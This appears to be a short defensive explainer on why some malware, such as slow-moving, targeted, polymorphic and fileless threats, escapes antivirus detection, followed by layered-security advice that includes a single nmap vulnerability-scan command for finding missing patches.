Undetectable Malware: Why Some Threats Slip Through

TL;DR

Yes, some malware is deliberately designed to be so slow-moving or subtle that it’s impractical for antivirus (AV) vendors to detect it reliably. This isn’t necessarily a failing of the AV software itself, but a trade-off between detection rates, system performance and resource costs. We’ll look at why this happens and what you can do about it.

Why Malware Can Go Undetected

1. Slow & Low Techniques: Some malware authors use techniques that spread very slowly or make tiny changes over long periods. AV relies on identifying patterns of malicious behaviour, but if the behaviour is gradual enough, it can be missed.
   • Example: A piece of software that subtly alters a single byte in a file every few days might not trigger any alarms.
2. Resource Intensive Analysis: Fully analysing all files and system activity for these kinds of threats requires significant computing power and time. AV vendors have to balance this against the need to keep systems running smoothly.
   • Imagine scanning every single file on millions of computers, looking for tiny changes – it’s a huge task!
3. Targeted Attacks: Highly targeted attacks (Advanced Persistent Threats or APTs) often use custom malware that isn’t widely distributed. AV signatures are built based on common threats; unique, low-volume malware is harder to identify.
4. Polymorphism & Metamorphism: Malware can change its code each time it infects a system (polymorphism) or even rewrite itself entirely (metamorphism). This makes signature-based detection less effective. AV vendors try to keep up with these changes, but it’s a constant arms race.
5. Fileless Malware: This type of malware operates in memory and doesn’t write files to disk, making traditional file scanning ineffective. It often uses legitimate system tools (like PowerShell) for malicious purposes.
   • Detecting this requires monitoring process behaviour rather than looking at files.

What Can You Do?

1. Layer Your Security: Don’t rely on AV alone.
   • Firewall: Block unwanted network connections.
   • Intrusion Detection/Prevention Systems (IDS/IPS): Monitor for suspicious activity.
   • Endpoint Detection and Response (EDR): Provides more advanced monitoring and response capabilities than traditional AV.
2. Keep Software Updated: Patch vulnerabilities promptly.
   • Use a vulnerability scanner to identify missing updates:

     nmap --script vuln 

3. Regular Backups: If you get infected, you can restore your system from a clean backup.
4. User Awareness Training: Teach users to identify phishing emails and suspicious links.
5. Behavioural Analysis Tools: Look for tools that monitor process behaviour and flag anomalies.
   • These tools are better at detecting fileless malware and slow-moving threats.
6. Sandboxing: Run suspicious files in a safe, isolated environment (a sandbox) to see what they do before allowing them on your system.
7. Threat Intelligence Feeds: Subscribe to threat intelligence feeds to stay informed about the latest threats and indicators of compromise (IOCs).
   • These feeds can help you proactively block malicious domains, IP addresses, and file hashes.

Final Thoughts

No cybersecurity solution is perfect. Some malware *will* inevitably slip through the cracks. The key is to build a layered defence strategy that makes it harder for attackers to succeed and provides multiple opportunities to detect and respond to threats.